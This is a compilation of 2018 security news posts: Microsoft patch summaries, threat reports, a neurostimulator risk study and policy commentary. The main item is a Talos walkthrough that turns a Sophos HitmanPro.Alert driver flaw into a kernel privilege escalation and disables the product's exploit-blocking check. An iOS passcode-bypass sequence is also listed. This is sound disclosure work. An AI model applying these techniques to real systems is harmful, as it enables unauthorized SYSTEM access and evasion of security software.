For more on our coverage for these vulnerabilities, check out the SNORTⓇ blog post here.

Critical vulnerabilities

Microsoft disclosed 11 critical vulnerabilities this month, which we will highlight below. There is also a critical advisory covering Adobe Flash Player.

CVE-2018-8541, CVE-2018-8542, CVE-2018-8543, CVE-2018-8551, CVE-2018-8555, CVE-2018-8556, CVE-2018-8557 and CVE-2018-8588 are all memory corruption vulnerabilities in the Chakra scripting engine. They all lie in the way that the scripting engine handles objects in memory in the Microsoft Edge internet browser. These vulnerabilities could corrupt memory in a way that an attacker could execute code in the context of the current user. An attacker needs to convince a user to open a specially crafted, malicious website on Microsoft Edge in order to exploit these bugs.

CVE-2018-8476 is a remote code execution vulnerability in the Windows Deployment Services TFTP server. The bug lies in the way the TFTP server handles objects in memory. An attacker could exploit this vulnerability by supplying the user with a specially crafted request.

CVE-2018-8553 is a remote code execution vulnerability in Microsoft Graphics Components that lies in the way Graphics Components handles objects in memory. An attacker can exploit this vulnerability by providing the user with a specially crafted file.

CVE-2018-8544 is a remote code execution vulnerability that exists in the way that the VBScript engine handles objects in memory. An attacker needs to trick a user into visiting a specially crafted website on Internet Explorer in order to exploit this vulnerability. Alternatively, the attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts Internet Explorer’s rendering engine.

ADV180025 addresses several vulnerabilities in Adobe Flash Player, which are outlined by Adobe in a separate release. Microsoft recommends updating to the latest version of Flash Player, as well as disabling Flash on its web browsers.

Important vulnerabilities

There are also 40 important vulnerabilities in this release. We would like to specifically highlight seven of them.

CVE-2018-8256 is a remote code execution vulnerability in PowerShell when it improperly handles specially crafted files. An attacker could execute malicious code on a vulnerable system. This update fixes the vulnerability by ensuring that PowerShell properly handles files.

CVE-2018-8574 and CVE-2018-8577 are remote code execution vulnerabilities in Microsoft Excel that occur when the software fails to properly handle objects in memory. An attacker could exploit these bugs by tricking the user into opening a specially crafted Excel file, either as an email attachment or by another method.

CVE-2018-8582 is a remote code execution vulnerability in Microsoft Outlook when the software fails to properly parse specially modified rule export files. Users who have their settings configured to allow fewer user rights are less impacted by this vulnerability than those who operate with administrative user rights. Workstations and terminal servers that use Microsoft Outlook are also at risk. An attacker needs to convince a user to open a specially crafted rule export file in an email in order to trigger this bug.

CVE-2018-8450 is a remote code execution vulnerability that exists when Windows Search handles objects in memory. An attacker could trigger this vulnerability by sending a specially crafted function to the Windows Search service, or via an SMB connection.

CVE-2018-8550 is an elevation of privilege in Windows COM Aggregate Marshaler. An attacker who successfully exploits the vulnerability could run arbitrary code with elevated privileges. The vulnerability does not directly allow the user to execute arbitrary code, but it could be used in conjunction with other bugs to execute code with elevated privileges.

CVE-2018-8570 is a remote code execution vulnerability in Internet Explorer that exists when the web browser improperly accesses objects in memory. An attacker could exploit this bug by hosting a malicious website that targets Internet Explorer and then convincing the user to visit the link.

The other important vulnerabilities are:

Moderate vulnerabilities

The one moderate vulnerability is CVE-2018-8546, a denial-of-service vulnerability in the Skype video messaging service.

Low vulnerability

There is also one low-rated vulnerability, CVE-2018-8416, which is a tampering vulnerability in the .NET Core.

Coverage

In response to these vulnerability disclosures, Talos is releasing the following SNORTⓇ rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.

Snort rules: 32637, 45142, 45143, 48399 - 48404, 48374 - 48388, 48393 - 48395, 48360 - 48373, 48408 - 48410

Research Drives Protection

The threat landscape has changed often in the 22 years I’ve been working at Trend Micro and it will continue to change for many more years. We in cybersecurity are constantly at battle with hackers and threat actors who look to infect our customers using the many tactics available to them. Our job is to ensure we can detect and protect against this onslaught of attacks. In order to do that we’ve had to invest heavily in research to better understand the many components of an attack, the actors themselves, and the threats used to compromise organizations. With 500,000 commercial customers and millions of consumers all over the world we have invested in multiple threat research facilities across the globe as well as security researchers located in many other areas where we feel a physical presence is needed.

Our newest center is in Toronto, Canada, where we have invested in more vulnerability research team members who are helping us improve our customers’ security. Vulnerability research is one area where Trend Micro has been investing heavily over the last several years. Besides our own internal researchers, our Zero Day Initiative (ZDI), which is the largest vendor-agnostic bug bounty program in the world, gives us unprecedented visibility into the latest 0-day vulnerabilities that could be used to exploit our customers. ZDI today helps us publish virtual patches 72 days on average before the formal patch is published by affected vendors.

Besides vulnerability research, we have to invest in other areas of the threat landscape since our customers will be targeted across their entire network. This means ensuring we have threat experts who have a deep knowledge of these threats.  Below you will see many of the different research areas we cover.

As you can see above, we use our research to regularly improve protection for our customers. It also drives our innovation which you can see in this interactive infographic has been extensive over the past 30 years Trend Micro has been in business.

We share our research in many ways, as you can also see above. Besides updates for our customers, we publish regular blogs detailing the latest threats found, reports from our researchers, and bi-annual reports focused on the past six or 12 months of threat activity we’ve seen. Through ZDI we responsibly disclose many vulnerabilities discovered by the program’s 3,500+ outside researchers who submit bugs to us regularly.

While I can’t get into all the details of where Trend Micro invests in research, I can let you check out a fun interactive infographic that can help you understand better what I’ve been talking about. What does this all mean to you? Know that Trend Micro will continue to invest in areas we need to in order to better protect our customers.

The Pentagon Is Publishing Foreign Nation-State Malware

This is a new thing:

The Pentagon has suddenly started uploading malware samples from APTs and other nation-state sources to the website VirusTotal, which is essentially a malware zoo that's used by security pros and antivirus/malware detection engines to gain a better understanding of the threat landscape.

This feels like an example of the US's new strategy of actively harassing foreign government actors. By making their malware public, the US is forcing them to continually find and use new vulnerabilities.

EDITED TO ADD (11/13): This is another good article. And here is some background on the malware.

Bank Attacks Put Password Insecurity Back in the Spotlight

Two separate attacks on banks in the United States and Pakistan revealed this week highlight once again the inherent weakness of a security practice that relies on passwords or knowledge-based credentials to protect critical information. International bank HSBC said it was a victim of a credential-stuffing attack and became aware of unauthorized access...

iOS 12.1 Vulnerability

This is really just to point out that computer security is really hard:

Almost as soon as Apple released iOS 12.1 on Tuesday, a Spanish security researcher discovered a bug that exploits group Facetime calls to give anyone access to an iPhone user's contact information with no need for a passcode.

[...]

A bad actor would need physical access to the phone that they are targeting and has a few options for viewing the victim's contact information. They would need to either call the phone from another iPhone or have the phone call itself. Once the call connects they would need to:

  • Select the Facetime icon
  • Select "Add Person"
  • Select the plus icon
  • Scroll through the contacts and use 3D touch on a name to view all contact information that's stored.

Making the phone call itself without entering a passcode can be accomplished by either telling Siri the phone number or, if they don't know the number, they can say "call my phone." We tested this with both the owner's voice and a stranger's voice; in both cases, Siri initiated the call.

Which Threats had the Most Impact During the First Half of 2018?

One of the best ways for organizations to shore up their data security efforts and work toward more proactive protection is by examining trends within the threat environment.

Taking a look at the strategies for attack, infiltration and infection currently being utilized by hackers can point toward the types of security issues that will continue in the future and enable enterprises to be more prepared with the right data and asset safeguarding measures.

Each year brings both continuing and emerging threats which can complicate security efforts. Awareness of the most impactful threats – including those that might have been popular in the past, as well as the new approaches spreading among cybercriminals – is crucial in the data security landscape.

Recently, Trend Micro researchers examined the data protection and cyberthreat issues prevalent during the first half of 2018 and included these findings in the 2018 Midyear Security Roundup: Unseen Threats, Imminent Losses report.

Let’s take a closer look at this research, as well as top identified threats that impacted businesses during the first six months of this year.

Widespread vulnerabilities and software patching

Back in 2014, the world was introduced to Heartbleed. At the time, it was one of the largest and most extensive software vulnerabilities, impacting platforms and websites leveraging the popular OpenSSL cryptographic software library. The bug made global news because of the vast number of websites it affected, as well as the fact that it enabled malicious actors to access, read and potentially leak data stored in systems’ memory.

Since then, a few additional vulnerabilities have been identified, including two at the beginning of 2018. Design flaws within microprocessing systems – since dubbed Meltdown and Spectre – were identified by researchers. Unfortunately, though, these weren’t the only high-profile vulnerabilities to make headlines this year.

As Trend Micro reported in May, eight other vulnerabilities were uncovered following Meltdown and Spectre, which also impacted Intel processors, including four that were considered “high” severity threats. Because these processors are used by a considerable number of devices within businesses and consumer environments across the globe, the emerging vulnerabilities were significantly worrisome for security admins and individual users alike.

Vulnerabilities that affect such large numbers of devices and users can be a significant challenge for enterprise security postures. Taking a cue from Heartbleed, the Register reported that despite the fact that a patch was released several years earlier, an estimated 200,000 systems were still vulnerable to the bug in early 2017.

Installing software updates in a timely manner is a top facet of patching best practices.

Spectre, Meltdown and the series of other identified vulnerabilities showcase the key importance of proper patching. Even Intel worked to drive this point home in a released statement encouraging users to maintain a beneficial patching strategy.

“We believe strongly in the value of coordinated disclosure and will share additional details on any potential issues as we finalize mitigations,” Intel noted, according to TechSpot. “As a best practice, we continue to encourage everyone to keep their systems up-to-date.”

The mere presence of an identified vulnerability can create security weaknesses, but an unpatched system can boost the chances of an attack or breach incident even further. It’s imperative that, in light of these widespread vulnerabilities, enterprises ensure their patching processes are comprehensive and proactive.

Cryptocurrency mining steals valuable resources

Researchers also noted that while cryptocurrency mining activity became more prevalent in 2017, this trend continued into the first half of 2018. Cryptocurrency mining programs can be more of an issue than many users might realize, as such a malicious initiative can rob enterprise infrastructures of key computing resources required to maintain top performance of their critical systems and applications, not to mention result in increased utility costs.

During the first six months of 2018, researchers recorded a more than 140 percent increase in cryptocurrency mining activity through Trend Micro’s Smart Protection Network infrastructure. What’s more, 47 new miner malware families were identified during Q1 and Q2, demonstrating that cryptocurrency mining will continue to be a top initiative for hackers.

“Unwanted cryptocurrency miners on a network can slow down performance, gradually wear down hardware, and consume power – problems that are amplified in enterprise environments,” Trend Micro researchers stated in the Unseen Threats, Imminent Losses report. “IT admins have to keep an eye out for unusual network activity considering the stealthy but significant impact cryptocurrency mining can have on a system.”

Ransomware: No end in sight

For years, ransomware infections have been a formidable threat to organizations within every industry, and the first half of 2018 saw no change in this trend. Researchers again identified an increase in ransomware infection activity – 3 percent. While this may seem small, the current rate at which ransomware attacks take place makes this rise significant.

At the same time, Trend Micro discovered a 26 percent decrease in new ransomware families. This means that while hackers are continuing to leverage this attack style to extort money from victims, they are utilizing existing, standby ransomware samples, creating fewer opportunities for zero-day ransomware threats.

Data breaches remain a constant issue for businesses of all shapes and sizes.

Mega breaches: An increasingly frequent issue

As the sophistication and potential severity of hacker activity continue to rise, so too do the consequences of successful attacks.

According to data from the Privacy Rights Clearinghouse, there was a 16 percent increase in data breaches reported in the U.S. during the first half of 2018, including 259 incidents overall. Fifteen of these events were considered “mega breaches,” or those that exposed 1 million records or more over the course of the breach and subsequent fallout.

Such incidents surpass traditional breaches in widespread effects on the victim company, its users and customers and the industry sector at large. Most of these mega breaches (71 percent) took place within the healthcare industry, and when one considers the significant amount of sensitive data healthcare institutions deal with, such threat environment conditions aren’t that surprising.

It’s also important to consider not only the traditional impact of regular and mega breaches – including losses related to company reputation and image, revenue, customer acquisition and retention and more – but the compliance costs that can emerge as well. This is an especially imperative consideration in the age of the EU’s General Data Protection Regulation, which became enforceable in May.

“This regulation … sets a high bar for data security and privacy protection,” Trend Micro’s report stated. “It imposes considerable fines for noncompliant organizations … Moreover, it has quite a long reach since any organization holding EU citizens’ data is affected.”

Check out Trend Micro’s GDPR Resource Center to learn more about maintaining compliance with this standard.

Read Trend Micro’s Unseen Threats, Imminent Losses report for more information about the top threats identified during the first half of this year.


Talos Vulnerability Deep Dive – TALOS-2018-0636 / CVE-2018-3971 Sophos HitmanPro.Alert vulnerability

Marcin Noga of Cisco Talos discovered this vulnerability.

Introduction


Sophos patched two vulnerabilities in Sophos HitmanPro.Alert in version 3.7.9.759. We publicly disclosed these issues last week here. In this post, Cisco Talos will show you the process of developing an exploit for one of these bugs. We will take a deep dive into TALOS-2018-0636/CVE-2018-3971 to show you the exploitation process.

Sophos HitmanPro.Alert is a threat-protection solution based on heuristic algorithms that detect and block malicious activity. Some of these algorithms need kernel-level access to gather the appropriate information they need. The software's core functionality has been implemented in the `hmpalert.sys` kernel driver by Sophos. This blog will show how an attacker could leverage TALOS-2018-0636 to build a stable exploit to gain SYSTEM rights on the local machine.


Vulnerability Overview


During our research, we found two vulnerabilities in the `hmpalert.sys` driver's IO control handler. For the purposes of this post, we will focus only on TALOS-2018-0636/CVE-2018-3971, an escalation of privilege vulnerability in Sophos HitmanPro.Alert. First, we will turn it into a reliable write-what-where vulnerability and then later into a fully working exploit.

First, we use the `OSR Device Tree` tool (Figure 1) to analyse the `hmpalert.sys` driver's access rights.

Figure 1. Device Tree application showing hmpalert device privilege settings


We can see that any user logged into the system can obtain a handle to the `hmpalert` device and send an I/O request to it. Keep this in mind for building the exploit. As we mentioned in the original vulnerability blog post, the I/O handler related to this vulnerability is triggered by the IOCTL code `0x2222CC`. The vulnerable code looks similar to the one below.

Figure 2. Body of a vulnerable function

The nice thing is that we fully control the first three parameters of this function, but we do not control the source data completely (e.g. the `srcAddress` needs to point to some memory area related to the lsass.exe process) (line 12).

Additionally, data read from the lsass.exe process (line 23) is copied to the destination address the `dstAddress` parameter is pointing to (line 33).

With this basic information, we can construct the first proof of concept exploit to trigger the vulnerability:

Figure 3. Minimal proof of concept to trigger the vulnerability

This looks like it could work, but it's not enough to create a fully working exploit. We need to dig into the `inLsassRegions` function and see how exactly the `srcAddress` parameter is tested. We have to check if we will be able to predict this memory content and turn our limited `arbitrary write` access into a fully working `write-what-where` vulnerability.

Controlling the source


We need to dive into the `inLsassRegions` function to get more information about the `srcAddress` parameter:

Figure 4. The function responsible for checking if the `srcAddress` variable fits in one of the defined memory regions.
We can see that there is an iteration over the `memoryRegionsList` list elements, which are represented by the `memRegion` structure. The `memRegion` structure is quite simple — it contains a field pointing to the beginning of the region and a second field that's the size of the region. The `srcAddress` value needs to fit into one of the `memoryRegionsList` elements boundaries. If this is the case, the function returns 'true' and the data is copied.

The function will return 'true' even if only the `srcAddress` value fits between the boundaries (line 21). If the `srcSize` value is larger than the available region space, the `srcSize` variable is updated with the available size (line 26). The question is: What do these memory regions represent, exactly? The `initMemoryRegionList` function will give us an idea.
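The region check described above, side by side with the destination check a hardened handler would also need, as an added illustration written for this post (it is neither Sophos's driver code nor Talos's exploit code): the region list is constructed, the x64 user-mode ceiling is Windows' `MM_HIGHEST_USER_ADDRESS`, and the kernel address used in the demo is the `hmpalert.sys` global named later in the post.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* One element of the driver's memoryRegionsList as the post describes it:
 * a start address and a size. Field names are ours. */
typedef struct {
    uint64_t base;
    uint64_t size;
} mem_region_t;

/* Highest user-mode address on x64 Windows (MM_HIGHEST_USER_ADDRESS);
 * any address above it belongs to the kernel. */
#define X64_HIGHEST_USER_ADDRESS 0x00007FFFFFFEFFFFULL

/* Constructed stand-in for the list the driver builds from lsass.exe's
 * PEB: a single ntdll.dll-like mapping. Not real addresses. */
static const mem_region_t kLsassRegions[] = {
    { 0x00007FFA12340000ULL, 0x001F0000ULL },
};
static const size_t kLsassRegionCount =
    sizeof(kLsassRegions) / sizeof(kLsassRegions[0]);

/* Models inLsassRegions as the post describes it: the request is accepted
 * as soon as src falls inside any region (figure 4, line 21); if size runs
 * past the end of that region it is clamped to what remains (line 26). */
static bool in_lsass_regions(const mem_region_t *regions, size_t count,
                             uint64_t src, uint64_t *size)
{
    for (size_t i = 0; i < count; i++) {
        uint64_t start = regions[i].base;
        uint64_t end   = regions[i].base + regions[i].size; /* exclusive */
        if (src >= start && src < end) {
            uint64_t avail = end - src;
            if (*size > avail)
                *size = avail;
            return true;
        }
    }
    return false;
}

typedef enum {
    COPY_OK = 0,
    COPY_BAD_SOURCE,      /* src is not inside any lsass region */
    COPY_BAD_DESTINATION  /* dst range reaches into kernel address space */
} copy_verdict_t;

/* Hardened validation: the source check above plus the destination check
 * the vulnerable handler lacks. A real driver would ProbeForWrite(dst, size)
 * inside __try/__except; here it is modelled as a user-range check that
 * also rejects dst + size wrapping around. */
static copy_verdict_t validate_copy_request(uint64_t src, uint64_t dst,
                                            uint64_t *size)
{
    if (!in_lsass_regions(kLsassRegions, kLsassRegionCount, src, size))
        return COPY_BAD_SOURCE;
    if (dst > X64_HIGHEST_USER_ADDRESS)
        return COPY_BAD_DESTINATION;
    /* last byte written is dst + *size - 1; compare without overflowing */
    if (*size > 0 && X64_HIGHEST_USER_ADDRESS - dst < *size - 1)
        return COPY_BAD_DESTINATION;
    return COPY_OK;
}

/* Size the driver would actually copy for a source request, 0 if the
 * source is rejected. */
static uint64_t effective_size(uint64_t src, uint64_t size)
{
    return in_lsass_regions(kLsassRegions, kLsassRegionCount, src, &size)
               ? size : 0;
}

/* Verdict of the hardened check for one (src, dst, size) request. */
static copy_verdict_t check_request(uint64_t src, uint64_t dst, uint64_t size)
{
    return validate_copy_request(src, dst, &size);
}

int main(void)
{
    /* src inside the region, dst the hmpalert.sys global from the post
     * (kernel space): the hardened check refuses it (verdict 2). */
    printf("kernel dst verdict: %d\n",
           check_request(0x00007FFA12340100ULL, 0xFFFFF807A4FA0FA4ULL, 4));
    /* 0x100 bytes remain before the region ends, so 0x1000 is clamped */
    printf("clamped size: 0x%llx\n",
           (unsigned long long)effective_size(0x00007FFA1252FF00ULL, 0x1000));
    return 0;
}
```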

Figure 5. Initialization of memory regions list.
We can see that the context of a current thread is switched to the `lsass.exe` process address space and then the `createLsaRegionList` function is called:

Figure 6. Various memory elements of the lsass.exe processes are added to the memory regions list.

Now we can see that the memory regions list is filled with elements from the `lsass.exe` PEB structure. The ImageBase addresses of the loaded and mapped DLLs, together with their SizeOfImage (line 31), are added to the list, along with other information. Unfortunately, the `lsass.exe` process is running as a service. This means that with normal user access rights, we won't be able to read its PEB structure, but we can leverage the knowledge about the mapped DLLs in the exploit in the following way: System DLLs like `ntdll.dll` are mapped into each process at the same address, so we can copy bytes from these system DLLs in the `lsass.exe` process memory regions into the memory location pointed to by the `dstAddress` parameter. With that in mind, we can start creating our exploit.

Exploitation


This is not a typical `write-what-where` vulnerability like you see in the common exploitation training class, but nevertheless, we don't need to be too creative to exploit it. The presented exploitation process is based on the research presented by Morten Schenk during his presentation at the BlackHat USA 2017 conference. It also includes modifications from Mateusz "j00ru" Jurczyk, which he included in his paper "Exploiting a Windows 10 PagedPool off-by-one overflow (WCTF 2018)." With a few changes, we can use j00ru's code, WCTF_2018_searchme_exploit.cpp, as a template for our exploit. These changes include:
  1. Removing all code related to pool feng shui.
  2. Writing a class for memory operations using the primitives found in the hmpalert.sys driver.
  3. Updating the important exploit offsets based on the ntoskrnl.exe and win32kbase.sys versions.
Then, we will be able to use the mentioned strategy from Morten and Mateusz:
  1. Leak addresses of certain kernel modules using the NtQuerySystemInformation API — We assume that our user operates at the `Medium IL` level.
  2. Overwrite the function pointer inside `NtGdiDdDDIGetContextSchedulingPriority` with the address of `nt!ExAllocatePoolWithTag`.
  3. Call `NtGdiDdDDIGetContextSchedulingPriority` (`= ExAllocatePoolWithTag`) with the `NonPagedPool` parameter to allocate writable/executable memory.
  4. Write the ring-0 shellcode to the allocated memory buffer.
  5. Overwrite the function pointer inside `NtGdiDdDDIGetContextSchedulingPriority` with the address of the shellcode.
  6. Call `NtGdiDdDDIGetContextSchedulingPriority` (`= shellcode`).
     • The shellcode will escalate our privileges to SYSTEM access rights after copying a security TOKEN from the system process to our process.

Test environment


Tested on: Windows 10 x64, build 17134.rs4_release.180410-1804

Vulnerable product: Sophos HitmanPro.Alert 3.7.8 build 750

Memory operation primitives


To simplify memory operations, we wrote a class using the found memory operation primitives in the hmpalert.sys driver.

Figure 7. The memory class implementation

The core `copy_mem` method is implemented like this:

Figure 8. The Memory::copy_mem method implementation


We initialize a couple of important elements inside the class constructor:

Figure 9. The memory class constructor implementation

We can use the `write_mem` method to write a certain value to a specific address:

Figure 10. The memory class write_mem method implementation
We cannot directly copy bytes defined in the `data` argument. Therefore, we need to search for each byte from the `data` argument in the mapped `ntdll.dll` image and then pass the address of that byte to the hmpalert driver via the `srcAddress` parameter. That way, byte by byte, we overwrite the data at the destination address `dstAddress` with the bytes defined in the `data` argument. Using this class, we can easily overwrite the necessary kernel pointers and copy our shellcode to the allocated page:


Figure 11. Shellcode copy operation to an allocated page.

The rest of the exploit is straightforward, so we can leave the implementation as a task for the interested reader.

Fail — Zero-day protection really works!


Armed with a fully working exploit, we are ready to test it. If it works, we should get SYSTEM level privileges.

Figure 12. The elevated console is detected and terminated by the HitmanPro.Alert.
It looks like our exploit has been detected by HitmanPro.Alert's anti-zero-day detection engine. Looking at the exploit log, it seems that its entire code was executed, but the spawned elevated console has been terminated.

Figure 13. At the end of the exploit, the console with elevated rights is executed.

We can see in the system event log that HitmanAlert.Pro logged an exploitation attempt and classified it as a local privilege escalation:


Figure 13. Event log showing that it was logged by HitmanAlert.Pro as an attempted privilege escalation.

Using a zero-day to bypass anti-zero-day detection


We know that our exploit works correctly, but the problem is that it's terminated by the anti-exploitation engine during an attempt to spawn the elevated shell.

We can look at HitmanPro.Alert's engine to find out where this process-termination logic is implemented. The Microsoft Windows API provides `PsSetCreateProcessNotifyRoutine`, which can be used to monitor process creation in the OS. Searching for this API call in the `hmpalert.sys` driver, IDA shows a couple of calls.

Figure 14. Registration of `ProcessNotifyRoutine` via `PsSetCreateProcessNotifyRoutine` API.
We do see some places where it registers the callback routine. Let's look into the implementation of the `ProcessNotifyRoutine`. While stepping through it, we found the following code:

Figure 15. An implementation of `ProcessesKiller` function, responsible for the termination of potentially malicious processes.
At line 44, you can see a call to the routine that's responsible for killing "dangerous/malicious" processes. As we can see at line 5, there is a condition checking whether a global variable `dword_FFFFF807A4FA0FA4` is set. If it is not set, the rest of the function code will not be executed. All we need to do is to overwrite the value of this global variable with a value of zero to avoid termination of our elevated console. The final portion of the exploit looks like this:

Figure 16. Overwriting a global variable in the `hmpalert.sys` driver to trick the `ProcessesKiller` function, allowing our spawned elevated console to execute.

Time to test our exploit in action.

Final exploit - LPE Windows 10 x64 / SMEP bypass

Summary


Due to the many anti-exploitation features in today's operating systems, weaponizing vulnerabilities can often be arduous, but this particular vulnerability shows that some Windows kernel-level flaws can still be exploited easily on modern Windows systems. This deep dive showed how an attacker could take a vulnerability and weaponize it into a stable, usable exploit. Talos will continue to discover and responsibly disclose vulnerabilities on a regular basis and provide additional deep-dive analysis when necessary. Check out our original disclosure here to find out how you can keep your system protected from this vulnerability.


Hackers attacking your memories: science fiction or future threat?

Authors: Kaspersky Lab and the Oxford University Functional Neurosurgery Group

There is an episode in the dystopian near-future series Black Mirror about an implanted chip that allows users to record and replay everything they see and hear. A recent YouGov survey found that 29% of viewers would be willing to use the technology if it existed.

If the Black Mirror scenario sounds a bit too much like science fiction, it’s worth noting that we are already well on the way to understanding how memories are created in the brain and how this process can be restored. Earlier this year proof of concept experiments showed that we can boost people’s ability to create short-term memories.

The seeds of the future are already here

The hardware and software to underpin this exists too: deep brain stimulation (DBS) is a neurosurgical procedure that involves implanting a medical device called a neurostimulator or implantable pulse generator (IPG) in the human body to send electrical impulses, through implanted electrodes, to specific targets in the brain for the treatment of movement and neuropsychiatric disorders. It is not a huge leap for these devices to become ‘memory prostheses’ since memories are also created by neurological activity in the brain.

To better understand the potential future threat landscape facing memory implants, researchers from Kaspersky Lab and the University of Oxford Functional Neurosurgery Group have undertaken a practical and theoretical threat review of existing neurostimulators and their supporting infrastructure.

The attached report is the outcome of that research. It should be noted that because much of the work involving neurostimulators is currently handled in medical research laboratories, it’s not easy to practically test the technology and associated software for vulnerabilities. However, much can be learned from handling the devices and seeing them used in situ, and this research involved both.

Among other things, the researchers found existing and potential risk scenarios, each of which could be exploited by attackers. These include:

  • Exposed connected infrastructure – the researchers found one serious vulnerability and several worrying misconfigurations in an online management platform popular with surgical teams.
  • Insecure or unencrypted data transfer between the implant, the programming software, and any associated networks could enable malicious tampering of a patient’s implant or even whole groups of implants (and patients) connected to the same infrastructure. Manipulation could result in changed settings causing pain, paralysis or the theft of private and confidential data.
  • Design constraints as patient safety takes precedence over security. For example, a medical implant needs to be controlled by physicians in emergency situations, including when a patient is rushed to a hospital far from their home. This precludes use of any password that isn’t widely known among clinicians. It also means that by default such implants need to be fitted with a software ‘backdoor’.
  • Insecure behavior by medical staff – programmers with patient-critical software were being accessed with default passwords, were used to browse the internet or had additional apps downloaded onto them.

Future risk predictions

Within five years, scientists expect to be able to electronically record the brain signals that build memories and then enhance or even rewrite them before putting them back into the brain. A decade from now, the first commercial memory boosting implants could appear on the market – and, within 20 years or so, the technology could be advanced enough to allow for extensive control over memories.

The healthcare benefits of all this will be significant, and this goal is helping to fund and drive research and development. However, as with other advanced bio-connected technologies, once the technology exists it will also be vulnerable to commercialization, exploitation and abuse.

New threats resulting from this could include the mass manipulation of groups through implanted or erased memories of political events or conflicts; while ‘repurposed’ cyberthreats could target new opportunities for cyber-espionage or the theft, deletion of or ‘locking’ of memories (for example, in return for a ransom).

Conclusion

Current vulnerabilities matter because the technology that exists today is the foundation for what will exist in the future. Although no attacks targeting neurostimulators have been observed in the wild – a fact that is not altogether surprising since the numbers currently in use worldwide are low, and many are implemented in controlled research settings – several points of weakness exist that will not be hard to exploit.

Many of the potential vulnerabilities could be reduced or even eliminated by appropriate security education for clinical care teams and patients. But healthcare professionals, the security industry, the developers and manufacturers of devices and associated professional bodies all have a role to play in ensuring emerging devices are secure. We believe that collaborating to understand and address emerging risks and vulnerabilities, and doing so now while this technology is still relatively new, will pay off in the future.

 “The Memory Market: Preparing for a future where cyberthreats target your past” full report (PDF)

Beers with Talos EP40: BWT XL feat. SuperMicro, Giant Patches, and More Mobile Malware



Beers with Talos (BWT) Podcast Ep. #40 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing, click here.

Ep. #40 show notes: 

Recorded Oct. 19, 2018 — In celebration of episode No. 40 and hitting over 1 million downloads(!!!), we go XL. This episode is a bit long, but we go a bit deeper than usual to discuss a few things that are highly unusual — namely, the extra-large patches dropped by Oracle, and the extra-large questions surrounding the Bloomberg/Super Micro story. We also talk about a few mobile threats we have seen and what we have brewing in the mobile threat space.

The timeline:

The topics

01:25 — Roundtable: Skeevy JavaScript, Mighty Reds update, potato camera, Joel’s petty HVAC complaints, and whatever Twitter drama Craig is on about.
07:30 — Agent Tesla and Loki playing tricks.
12:30 — What’s next in mobile threats from Talos, and the problem with app store models.
24:04 — Oracle drops 302 patches. Fancy ... some would even say extravagant.
36:30 — The Super Micro Bloomberg incident: What the **** is going on here?

The links



==========

Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).
Hosted by Mitch Neff (@MitchNeff).
Find all episodes here.

Subscribe via iTunes (and leave a review!)

Check out the Talos Threat Research Blog

Subscribe to the Threat Source newsletter

Follow Talos on Twitter

Give us your feedback and suggestions for topics:
beerswithtalos@cisco.com

Ireland needs a coherent national approach to cybersecurity

I was interviewed by the Irish Times on why “Ireland (is) Vulnerable to Cybersecurity Attack”. During my chat with Charlie Taylor I mentioned a number of concerns I have regarding how Ireland is dealing with cybersecurity at a national level and that in many areas it is disjointed, with no one department or function taking overall responsibility. The article mentions my calls for a cybersecurity tsar, but this is not the only area we need to work on.

October is known as European Cybersecurity Awareness Month, and countries throughout the EU, and indeed globally, have put together awareness campaigns aimed at their citizens and businesses alike. The whole purpose of these campaigns is to help people become more aware of the cybersecurity risks they face and to take the appropriate steps to protect themselves and others. A good awareness campaign is critical to support an effective cybersecurity strategy. However, when you go to the website of the European Agency for Network and Information Security to see which countries have government-sponsored campaigns, it is notable that, as per the picture below, Ireland has no such campaign.


This lack of support brought back to me the need for us as a nation to have an effective cybersecurity strategy to better protect our economy, infrastructure, businesses, and citizens.

I wrote about the need for a national cybersecurity strategy in a post back in 2009 “Securing Ireland’s Digital Future”. Since then we have had a strategy published in 2015 and the National Centre for Cybersecurity has been established.

The Government set up the National Cyber Security Centre in 2011 to protect critical national infrastructure. But according to a recent article in the Irish Times, a report by the public spending watchdog found that the unit has no strategic plan and needs a funding review. For anyone keen to establish Ireland as a centre for cybersecurity, then the Comptroller and Auditor General’s review of the National Cyber Security Centre made for disappointing reading.

That’s not to criticise the NCSC: it can only make do with the budget and resources it has. But the story suggests that the Government doesn’t take cybersecurity seriously. In year one, it allocated €800,000 in funding to the unit, but the following year, its funding fell below €266,000 and stayed at that level over the next three years.

The C&AG report also found that the oversight body that’s supposed to review the NCSC’s performance hasn’t met since 2015. That also happens to be the same year when the Government last published a cybersecurity strategy.

You only have to glance at the headlines to see how much of a prominent issue cybersecurity has become. Think of data breaches, DDoS attacks, online financial scams and state-sponsored activity, to name just four. Ransomware infections like WannaCry and NotPetya have cost businesses and public agencies significant sums of money, not to mention disrupted operations.

The C&AG also noted that in 2017, the NCSC’s funding rose again to €1.95 million. We know from reports that the Data Protection Commissioner and the Garda’s Computer Crime Investigation Unit also had their funding increased recently. But is that funding enough for what they need?

I would argue the Government needs to go further. We need a coherent and centralised approach to protecting our nation, rather than having responsibilities for various aspects for cybersecurity spread throughout different government departments and agencies.

Given how critical cybersecurity is to our ambitions as a nation to grow as a technical hub for Europe, the government should look to:

  • Establish a cybersecurity tsar with the autonomy and authority to drive a cybersecurity agenda at all levels of the public service, and to engage with the private sector.
  • Engage with key stakeholders to ensure all needs are met. The Citizens’ Assembly could be an excellent model or indeed forum to adopt to identify all the relevant needs.
  • Based on the above engagement develop a revised cybersecurity strategy with a concrete action plan to achieve the goals of the strategy. Earlier this month at CyberConf in Dublin, Minister Sean Kyne said that a new cybersecurity strategy is due in 2019. That’s not a moment too soon. We’ll await that document with interest.

While cybersecurity is everyone’s responsibility it is now too critical for us as a nation, both from an economic and national security point of view, for it to be left to individual government departments or businesses to look after.

As a small nation we have the unique advantage of being able to quickly engage with all key stakeholders and to implement initiatives to make us more secure.  It is time for us to ensure the security of our nation includes the realm of cyberspace and that Ireland can become a leading light in how to create a safe online space on the internet for its citizens and businesses alike.

The post Ireland needs a coherent national approach to cybersecurity appeared first on BH Consulting.

